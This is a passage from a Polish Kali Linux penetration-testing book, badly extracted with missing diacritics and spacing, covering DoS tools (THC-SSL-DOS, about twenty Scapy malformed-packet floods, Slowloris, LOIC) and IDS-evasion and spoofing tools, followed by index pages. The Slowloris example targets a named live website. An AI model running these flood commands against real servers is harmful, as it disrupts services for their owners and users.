Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

